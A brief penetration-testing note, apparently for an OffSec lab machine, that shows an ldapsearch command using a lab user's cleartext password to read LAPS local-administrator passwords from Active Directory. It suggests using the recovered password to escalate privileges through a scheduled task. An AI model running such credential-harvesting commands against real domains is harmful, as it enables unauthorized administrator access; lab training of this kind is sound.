Sometimes, you can query LAPS password via ldapsearch. You could use the password to create a task scheduler to escalate
Enumerate
Kali> ldapsearch -H ldap://$RHOST -x -D fmcsorley@HUTCH.OFFSEC -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# WinEPAS or AdPEAS may capture the LAPS password as well.